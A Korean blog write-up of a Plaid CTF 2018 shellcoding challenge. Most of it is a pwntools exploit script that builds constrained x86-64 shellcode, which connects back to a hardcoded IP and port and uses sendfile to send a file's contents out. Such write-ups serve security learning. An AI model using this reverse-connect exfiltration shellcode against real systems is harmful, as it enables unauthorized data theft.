[Plaid CTF 2018] Wait Wait... Don't Shell Me
close 로 fd를 다 닫았을때
reverse tcp로 연결
open sednfile로
read write 최적화 가능
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 | from pwn import * context.arch = 'amd64' CODES = '''b8 __ __ __ __ bf __ __ __ __ be __ __ __ __ ba __ __ __ __ 01 c7 29 fe 21 f2 0f 05 48 b8 __ __ __ __ __ __ __ __ 50 b8 __ __ __ __ ba __ __ __ __ bf __ __ __ __ 48 89 __ 0f 05 be __ __ __ __ bf __ __ __ __ ba __ __ __ __ 83 c0 __ 0f 05 89 __ b8 __ __ __ __ bf __ __ __ __ 41 ba __ __ __ __ 0f 05 58'''.replace(' ','').replace('\n','').replace('__','cc').decode('hex') #print disasm(CODES.replace('\xcc','\x90'),offset=False, byte=False) def assemble(code): codes = asm(code) print disasm(codes) print len(codes), len(CODES) assert len(codes) == len(CODES) byte = [] for i in xrange(len(codes)): if CODES[i] != '\xcc': assert CODES[i] == codes[i] else: byte.append(ord(codes[i])) return byte #for x in xrange(0, 0x100000, 0x100): x = 0 if 1: try: r = remote('wwdsm.chal.pwning.xxx',6615, level='error') print r.recv() code = ''' mov eax, SYS_socket mov edi, -SYS_socket+2 mov esi, 3 mov edx, 0 add edi,eax sub esi,edi and edx,esi syscall movabs rax,0x864add12d2040002 /*ip port AF_INET*/ push rax mov eax,SYS_connect mov edx,0x10 mov edi,0 mov rsi,rsp syscall mov esi,0 mov edi,0x400cb8+{} mov edx,0 add eax,SYS_open syscall mov esi, eax mov eax, SYS_sendfile mov edi,0 mov r10d,0x999 syscall pop rax '''.format(x) p = assemble(code) p = '\n'.join(map(lambda x: '%02x'%x,p)) r.sendline(p) print r.recv() print r.recvuntil('won!\n') print 0 #r.sendline('asdf') print r.recv() print r.recv() print r.recv() print r.recv() except KeyboardInterrupt: pass except Exception as e: print e finally: print x | cs |
'Hacking > CTF' 카테고리의 다른 글
[TrendMicro CTF 2017] Writeup - Reversing 400 ScreenKeyPad (1) | 2017.06.26 |
---|---|
2016 디미고 KDMHS CTF (0) | 2016.05.25 |
세종대 SSG CTF 2016 write up (1) | 2016.04.06 |
Codegate 2016 Junior Write up (0) | 2016.04.04 |
inc0gnito 2015 Write up (0) | 2015.08.25 |